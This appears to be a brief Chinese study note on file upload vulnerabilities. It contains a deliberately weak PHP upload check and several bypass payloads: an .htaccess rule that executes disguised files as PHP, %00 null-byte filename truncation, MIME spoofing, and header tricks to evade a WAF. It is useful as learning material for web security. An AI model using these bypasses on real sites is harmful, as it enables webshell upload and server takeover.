文件上传漏洞

<form action="" method="post" enctype="multipart/from-data" >
<input type="file" value="文件" name="sc">
<input type="submit" value="上传">
</form>
<?php
$type = $_FILES['SC']['type'];
/*
if($type=="image/jpeg"){
  echo "success";
            }
  else{
    echo "fail";
    }
  echo $name;
*/

$namearray=explode(".",$name);
if($namearray[1]=="jpg"){
echo "success";
}
else{
echo "fail";
}

?>

.htaccess攻击

  (上传漏洞)
  (伪装后门)
   <FilesMatch "xiao">
    SetHandler application/x-httpd-php
   </FilesMatch>


%00截断上传 判断文件后缀  访问地址url问题

  www.xxx.com/qq.jpg
  www.xxx.com/qq.php%00.jpg
  filename="123.php%00.jpg"
  将 %00 进行编码


上传类型修改上传 判断文件类型 mime

  Content-Type:image/jpeg

js绕过上传

  时间长短判断,看源代码

安全狗上传bypass研究

  Xss漏洞原理及利用方法

上传数据包:

  Content-Disposition: form-data; name="upfile"; filename=x.php;

    Content-Type: image/jpeg

     Content-Disposition:

    Name:上传数据包参数名(不能修改)

    Filename:文件名

    Content-Type:文件类型信息

  1.修改filename值,去掉双引号加上分号(双引号去掉,不让他上传值,加分号就是表示没有结束,让狗继续匹配)

  2.删除Content-Disposition的值

原文地址:https://www.cnblogs.com/China-Waukee/p/9642772.html